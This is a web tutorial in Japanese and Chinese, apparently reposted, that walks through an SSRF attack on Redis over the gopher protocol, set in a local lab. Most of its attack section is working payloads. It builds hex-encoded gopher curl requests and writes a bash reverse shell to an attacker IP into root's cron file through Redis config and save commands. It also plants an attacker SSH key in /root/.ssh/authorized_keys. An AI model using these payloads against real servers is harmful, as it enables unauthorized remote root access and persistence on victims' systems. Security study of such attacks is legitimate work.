目次
gopher プロトコルの形式
redisを攻撃
(1) 実験環境のセットアップ
(2) 事前の調査と導入
パスワードなしの Redis を攻撃してみる:
(2)GetShell:
(1)定时任务反弹shell
ホームページ データベース Redis Redis でのサーバー側リクエスト フォージェリ SSRF の分析例

Redis でのサーバー側リクエスト フォージェリ SSRF の分析例

May 30, 2023 am 09:18 AM
redis ssrf

SSRF、つまりサーバー側のリクエスト フォージェリ。ユーザーは、サーバーによって要求されたリソース、プロトコル、パスなどを制御できます。これにより、SSRF 攻撃が発生する可能性があります。

この記事では、gopher プロトコルと getshell を介した Redis サービスに対する SSRF 攻撃に焦点を当てます。

gopher プロトコルの形式

まず gopher プロトコルとは何か、その形式がどのようなものかを理解します:

gopher://:_TCP データ ストリームが続きます

redis での攻撃をテストするときは、テスト用に Linux に付属するカールを使用できます。

Centos を使用している場合、実験を確実に成功させるために、Centos selinux をオフにすることをお勧めします。

selinuxを閉じる:

setenforce 0

redisを攻撃

(1) 実験環境のセットアップ

virtual Centos7をインストールするだけです。

redis インストール:

wget http://download.redis.io/releases/redis-4.0.6.tar.gz //redis 圧縮パッケージをダウンロード

yum install gcc //インストール時に Gcc が必要です make

tar -xzvf redis-4.0.6.tar.gz //圧縮パッケージを解凍します cd redis-4.0.6 //圧縮パッケージのディレクトリを入力します

make MALLOC=libc //Compile

cd src //コンパイルが完了すると、フォルダー src が生成されるので、その src フォルダーに入ります

make install //インストール

redis 操作:

redis-4.0.6 ディレクトリ では、redis.conf が初期 Redis 構成ファイルです

redis-4.0.6/src ディレクトリ には、最も重要な実行可能ファイルが 2 つあります:

redis-server --server

redis- cli -- クライアント

はサーバー プログラムを直接実行して、redis サービスを開始します。

./redis-server
ログイン後にコピー

Redis でのサーバー側リクエスト フォージェリ SSRF の分析例

クライアント プログラムを直接実行し、デフォルトでローカル Redis サービスに接続します。

./redis-cli
ログイン後にコピー

(2) 事前の調査と導入

パスワードなしの Redis を攻撃してみる:

まず、パケット キャプチャ ソフトウェアをオンにして、redis と通信するデータ パケットをキャプチャする必要があります。

Linux では、tcpdump を使用してトラフィックをキャプチャできます。

tcpdump -i lo -s 0 port 6379 -w redis.pcap
ログイン後にコピー

ローカル インターフェイスのトラフィックをキャプチャする場合は、eth0 ではなく lo であることに注意してください。

ログに記録されます。最初に入力してから、set key オペレーションを実行します。

Redis でのサーバー側リクエスト フォージェリ SSRF の分析例

tcpdump によってキャプチャされたパケットをエクスポートし、wireshark で開き、TCP フローを追跡します。

見た目だけサーバーではなく、入力したデータで返されたデータには、次の数行しかないことがわかります。

Redis でのサーバー側リクエスト フォージェリ SSRF の分析例

「データの表示と保存名」の位置で、[Hex dump] を選択すると、次のデータが得られます:

Redis でのサーバー側リクエスト フォージェリ SSRF の分析例

赤いボックスは後で使用するものですペイロード

すべてをコピーしてエディターを使用します赤いボックスを除く無関係なデータをすべて削除します

Redis でのサーバー側リクエスト フォージェリ SSRF の分析例

#次に、各 16 進値の前にパーセント記号を追加して 1 つに並べます利用可能:

Redis でのサーバー側リクエスト フォージェリ SSRF の分析例

curl リクエストの構築:

curl -v 'gopher://127.0.0.1:6379/_%2a%31%0d%0a%24%37%0d%0a%43%4f%4d%4d%41%4e%44%0d%0a%2a%33%0d%0a%24%33%0d%0a%73%65%74%0d%0a%24%34%0d%0a%6b%65%79%31%0d%0a%24%36%0d%0a%76%61%6c%75%65%31%0d%0a' --output -
ログイン後にコピー
エコー:

Redis でのサーバー側リクエスト フォージェリ SSRF の分析例

クエリ キー:

Redis でのサーバー側リクエスト フォージェリ SSRF の分析例

キーは正常に設定できました。

パスワードを使用して redis を攻撃してみます:

まず、ログインにパスワードを要求するように redis を構成します:

redis の下の構成ファイルを変更します

redis.conf で、requirepass キーワードを検索します。

デフォルトの

requirepass がコメント化されているので、 コメント記号 を削除し、requirepass の後に Redis に設定したい を入力します。パスワード

Redis でのサーバー側リクエスト フォージェリ SSRF の分析例

構成後、redis を開始するコマンドは次のとおりです:

./redis-server redis配置文件路径
ログイン後にコピー

Redis でのサーバー側リクエスト フォージェリ SSRF の分析例

試行します攻撃パスワード redis:

まず、tcpdump パケット キャプチャを有効にしてから、redis コマンド ラインで操作を実行します:

Redis でのサーバー側リクエスト フォージェリ SSRF の分析例

トラフィックを再度キャプチャします。操作前と同様に、パスワードの検証は追加の認証コマンドを追加することを意味することがわかりました:

Redis でのサーバー側リクエスト フォージェリ SSRF の分析例

重复上文的步骤即可。

(2)GetShell:

接下来讲重点:通过 set key GetShell:

思路:

(1)将反弹shell命令写到定时任务里,攻击机只需要开一个netcat端口即可。

(2)写入ssh-keygen,进行ssh免密登录。

一个个细细道来。

(1)定时任务反弹shell

基本要求:

redis需要是以 root 权限运行,不然写不到 /var/spool/cron/ 目录下

1.首先得知道 Linux 下的定时任务是个什么东西:

Linux下设置定时任务命令为 crontab

配置文件为 /etc/crontab

下面这张图是配置文件里的内容,很好的说明了 crontab 配置的格式

Redis でのサーバー側リクエスト フォージェリ SSRF の分析例

这个配置文件应该只是供参考用的,我们的定时任务需要自己手动写在 /var/spool/cron/ 目录下

如果我们要每分钟执行一次命令 echo1 > /tmp/1.txt

则可以这么操作:

vim /var/spool/cron/root //root是文件名,一般以执行的用户命名

在文件中写入

* * * * * root echo1 > /tmp/1.txt

保存退出后,重启 crontab 服务:

systemctl restart crond.service

即可每一分钟执行一次该命令

2.接着要知道linux下通过输入输出流反弹shell

 命令:

/bin/bash -i >& /dev/tcp/192.168.1.105/8888 0>&1
ログイン後にコピー

 直接看效果:Redis でのサーバー側リクエスト フォージェリ SSRF の分析例

Redis でのサーバー側リクエスト フォージェリ SSRF の分析例

这里巧妙的结合了Linux中 文件描述符、重定向符和 /dev/

文件描述符 1 表示标准输入

文件描述符 2 表示标准输出

/bin/bash -i 表示的是调用bash命令的交互模式,并将交互模式重定向到 /dev/tcp/192.168.1.105/8888 中。

重定向时加入一个描述符 &,表示直接作为数据流输入。不加 & 时,重定向默认是输出到文件里的。

做个实例就清晰明了了

Redis でのサーバー側リクエスト フォージェリ SSRF の分析例

/dev/tcp/ip地址/端口号 是linux下的特殊文件,表示对这个地址端口进行tcp连接

这里我们设置成攻击机监听的地址

最后面的 0>&1 。此时攻击机和靶机已经建立好了连接,攻击机的输入就是从标准输入0传送至靶机

通过重定向符,重定向到 1(标准输入)中,由于是作为 /bin/bash 的标准输入,所以就执行了系统命令了。

3.还需要知道Redis如何写入文件

Redis 中可以导出当前数据库中的 key 和 value

并且可以通过命令配置导出路径和文件名:

config set dir /tmp/test      //设置导出路径
config set dbfilename root    //设置导出文件名
save                          //执行导出操作
ログイン後にコピー

Redis でのサーバー側リクエスト フォージェリ SSRF の分析例

Redis でのサーバー側リクエスト フォージェリ SSRF の分析例

可以看到,格式非常乱。不过还好linux中的cron不会报错,只要读到一行正确配置即可执行。

通过crontab定时任务 getshell

为了能让linux能够正确读到一行,我们在 set key 的时候手动添加 \n(换行)

redis语句:

config set dir /var/spool/cron
config set dbfilename root
set test1 "\n\n\n* * * * * /bin/bash -i >& /dev/tcp/192.168.1.105/8888 0>&1\n\n\n"
save
ログイン後にコピー

转换成 gopher协议,进行curl请求:

Redis でのサーバー側リクエスト フォージェリ SSRF の分析例

成功写入:

Redis でのサーバー側リクエスト フォージェリ SSRF の分析例

成功getshell:

Redis でのサーバー側リクエスト フォージェリ SSRF の分析例

注意:这里有一个坑点。

cron文件不需要写用户名,不然会报错:

Redis でのサーバー側リクエスト フォージェリ SSRF の分析例

Redis でのサーバー側リクエスト フォージェリ SSRF の分析例

(2)ssh免密登录

在linux中,ssh可配置成免密登录。

需要修改 ssh 配置文件 /etc/ssh/sshd_config

#StrictModes yes
ログイン後にコピー

改为

StrictModes no
ログイン後にコピー

然后重启sshd即可

免密登录条件:

客户端生成公钥和私钥

将公钥上传至服务端 即可

在SSRF利用中,同样需要root权限运行 redis

如果不是root权限,需要能够 ssh 登录的用户权限运行 redis

正常免密登录流程:

1.客户端先生成公钥和私钥

使用工具 ssh-keygen:

ssh-keygen -t rsa
ログイン後にコピー

Redis でのサーバー側リクエスト フォージェリ SSRF の分析例

执行完毕后将会在 用户家目录中的 .ssh文件夹中放有公钥与私钥 文件

有.pub后缀的就是公钥,没有.pub后缀的就是私钥

Redis でのサーバー側リクエスト フォージェリ SSRF の分析例

2.上传公钥至服务器

将公钥上传至服务端的 /root/.ssh目录下

嫌麻烦可以用 ssh-copy-id工具

Redis でのサーバー側リクエスト フォージェリ SSRF の分析例

Redis でのサーバー側リクエスト フォージェリ SSRF の分析例

3.重命名文件为authorized_keys

文件名要重命名为 authorized_keys

authorized_keys 文件内容如下:

Redis でのサーバー側リクエスト フォージェリ SSRF の分析例

如果有多台客户端需要免密登录,新起一行,新行中写对应的客户端的公钥值即可

类似这样:

Redis でのサーバー側リクエスト フォージェリ SSRF の分析例

4.免密登录

传好后即可免密登录:

Redis でのサーバー側リクエスト フォージェリ SSRF の分析例

ssh免密登录 getshelll

我们知道了要写入的文件位置、要写入的内容(公钥事先生成好),我们可以构造redis语句了:

//先配置路径
config set dir /root/.ssh      
config set dbfilename authorized_keys
//写入公钥
set test2 "\n\n\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC/unZTA0b1HtFsgjXlWM4Bt65Ubx72z/dkLJrqCJJpfsD+F27uix6J3GWuIKaHurabFR40eJ2EqWWs/FCKpBvnJ+msSWWyn9C8WyWY19HydE9ldIO8SjdoOfQ7pf0Q2dwMKSr6F3L8Dy04ULQsCwGEu8X0fdwCZIggagTwGXWZS/M89APJKSVn7v5jhgRy/dCSGwN5wwFakSQSbWtW396V/iP2svU7IAznqIX4tyZII/DX1751LqA0ufVzIoK1Sc9E87swjupDD4ZGxX6ks676JYQHdZSYHoQioM9kWVsB2ntBfBsIFHu+yX1V9tkTTB0E5eaWuitzzsi8xfAz0xBag3f8wiPvlbuLV/TwOXHABGt1HQNhg5wnfZYnebRNdn5QeDXNY1XtLjc3T9UTYe7FmT6hG+RvI+7OSywDIvaGq+PjAQN1KPOBFJtNG5iha3bYds05zR5LCM8ZzLRTcKP9Djo79fum8iOC8DjrxVp49RilDobr1/oZzn+91YJIq1M= root@kali\n\n\n"
//保存
save
ログイン後にコピー

改成gopher协议格式: 

Redis でのサーバー側リクエスト フォージェリ SSRF の分析例

查看 authorized_keys 文件:

Redis でのサーバー側リクエスト フォージェリ SSRF の分析例 

成功免密登录:

Redis でのサーバー側リクエスト フォージェリ SSRF の分析例

以上がRedis でのサーバー側リクエスト フォージェリ SSRF の分析例の詳細内容です。詳細については、PHP 中国語 Web サイトの他の関連記事を参照してください。

このウェブサイトの声明
この記事の内容はネチズンが自主的に寄稿したものであり、著作権は原著者に帰属します。このサイトは、それに相当する法的責任を負いません。盗作または侵害の疑いのあるコンテンツを見つけた場合は、admin@php.cn までご連絡ください。

ホットAIツール

Undresser.AI Undress

Undresser.AI Undress

リアルなヌード写真を作成する AI 搭載アプリ

AI Clothes Remover

AI Clothes Remover

写真から衣服を削除するオンライン AI ツール。

Undress AI Tool

Undress AI Tool

脱衣画像を無料で

Clothoff.io

Clothoff.io

AI衣類リムーバー

AI Hentai Generator

AI Hentai Generator

AIヘンタイを無料で生成します。

ホットツール

メモ帳++7.3.1

メモ帳++7.3.1

使いやすく無料のコードエディター

SublimeText3 中国語版

SublimeText3 中国語版

中国語版、とても使いやすい

ゼンドスタジオ 13.0.1

ゼンドスタジオ 13.0.1

強力な PHP 統合開発環境

ドリームウィーバー CS6

ドリームウィーバー CS6

ビジュアル Web 開発ツール

SublimeText3 Mac版

SublimeText3 Mac版

神レベルのコード編集ソフト(SublimeText3)

Windows 11 10.0.22000.100 のインストール時の 0x80242008 エラーの解決策 Windows 11 10.0.22000.100 のインストール時の 0x80242008 エラーの解決策 May 08, 2024 pm 03:50 PM

1. [スタート]メニューを起動し、[cmd]と入力し、[コマンドプロンプト]を右クリックし、[管理者として実行]を選択します。 2. 次のコマンドを順番に入力します (注意してコピーして貼り付けてください): SCconfigwuauservstart=auto、Enter キーを押す SCconfigbitsstart=auto、Enter キーを押す SCconfigcryptsvcstart=auto、Enter キーを押す SCconfigtrustedinstallerstart=auto、Enter キーを押す SCconfigwuauservtype=share、Enter キーを押す netstopwuauserv 、enter netstopcryptS を押す

Golang API のキャッシュ戦略と最適化 Golang API のキャッシュ戦略と最適化 May 07, 2024 pm 02:12 PM

GolangAPI のキャッシュ戦略により、パフォーマンスが向上し、サーバーの負荷が軽減されます。一般的に使用される戦略は、LRU、LFU、FIFO、TTL です。最適化手法には、適切なキャッシュ ストレージの選択、階層型キャッシュ、無効化管理、監視とチューニングが含まれます。実際には、データベースからユーザー情報を取得する API を最適化するために LRU キャッシュが使用されます。それ以外の場合は、データベースからデータを取得した後にキャッシュを更新できます。

PHP 開発におけるキャッシュ メカニズムとアプリケーションの実践 PHP 開発におけるキャッシュ メカニズムとアプリケーションの実践 May 09, 2024 pm 01:30 PM

PHP 開発では、キャッシュ メカニズムにより、頻繁にアクセスされるデータがメモリまたはディスクに一時的に保存され、データベース アクセスの数が削減され、パフォーマンスが向上します。キャッシュの種類には主にメモリ、ファイル、データベース キャッシュが含まれます。キャッシュは、組み込み関数またはサードパーティのライブラリ (cache_get() や Memcache など) を使用して PHP に実装できます。一般的な実用的なアプリケーションには、データベース クエリ結果をキャッシュしてクエリ パフォーマンスを最適化したり、ページ出力をキャッシュしてレンダリングを高速化したりすることが含まれます。キャッシュ メカニズムにより、Web サイトの応答速度が効果的に向上し、ユーザー エクスペリエンスが向上し、サーバーの負荷が軽減されます。

Win11 英語 21996 を簡体字中国語 22000 にアップグレードする方法_Win11 英語 21996 を簡体字中国語 22000 にアップグレードする方法 Win11 英語 21996 を簡体字中国語 22000 にアップグレードする方法_Win11 英語 21996 を簡体字中国語 22000 にアップグレードする方法 May 08, 2024 pm 05:10 PM

まず、システム言語を簡体字中国語表示に設定して再起動する必要があります。もちろん、以前に表示言語を簡体字中国語に変更したことがある場合は、この手順をスキップできます。次に、レジストリ regedit.exe の操作を開始し、左側のナビゲーション バーまたは上部のアドレス バーで HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlNlsLanguage に直接移動し、InstallLanguage キーの値と Default キーの値を 0804 に変更します (英語に変更する場合)。まずシステムの表示言語を en-us に設定し、システムを再起動してから、すべてを 0409 に変更します) この時点でシステムを再起動する必要があります。

PHP 配列のページネーションで Redis キャッシュを使用するにはどうすればよいですか? PHP 配列のページネーションで Redis キャッシュを使用するにはどうすればよいですか? May 01, 2024 am 10:48 AM

Redis キャッシュを使用すると、PHP 配列ページングのパフォーマンスを大幅に最適化できます。これは、次の手順で実現できます。 Redis クライアントをインストールします。 Redisサーバーに接続します。キャッシュ データを作成し、データの各ページをキー「page:{page_number}」を持つ Redis ハッシュに保存します。キャッシュからデータを取得し、大規模な配列での高コストの操作を回避します。

Win11でダウンロードしたアップデートファイルの探し方_Win11でダウンロードしたアップデートファイルの場所を共有する Win11でダウンロードしたアップデートファイルの探し方_Win11でダウンロードしたアップデートファイルの場所を共有する May 08, 2024 am 10:34 AM

1. まず、デスクトップ上の[このPC]アイコンをダブルクリックして開きます。 2. 次に、マウスの左ボタンをダブルクリックして [C ドライブ] に入ります。システム ファイルは通常、自動的に C ドライブに保存されます。 3. 次に、C ドライブで [windows] フォルダーを見つけ、ダブルクリックしてに入ります。 4. [windows]フォルダーに入ったら、[SoftwareDistribution]フォルダーを見つけます。 5. 入力後、win11 のダウンロード ファイルとアップデート ファイルがすべて含まれている [ダウンロード] フォルダーを見つけます。 6. これらのファイルを削除したい場合は、このフォルダー内で直接削除してください。

PHP Redis キャッシュ アプリケーションとベスト プラクティス PHP Redis キャッシュ アプリケーションとベスト プラクティス May 04, 2024 am 08:33 AM

Redis は、高性能のキー/値キャッシュです。 PHPRedis 拡張機能は、Redis サーバーと対話するための API を提供します。 Redis に接続し、データを保存および取得するには、次の手順を使用します。 接続: Redis クラスを使用してサーバーに接続します。ストレージ: set メソッドを使用してキーと値のペアを設定します。取得: get メソッドを使用してキーの値を取得します。

さまざまな PHP バージョンで関数のパフォーマンスを最適化するにはどうすればよいですか? さまざまな PHP バージョンで関数のパフォーマンスを最適化するにはどうすればよいですか? Apr 25, 2024 pm 03:03 PM

さまざまな PHP バージョンで関数のパフォーマンスを最適化する方法には、分析ツールを使用して関数のボトルネックを特定すること、オペコード キャッシュを有効にするか外部キャッシュ システムを使用すること、型アノテーションを追加してパフォーマンスを向上させること、および PHP バージョンに応じて適切な文字列連結およびソート アルゴリズムを選択することなどが含まれます。

See all articles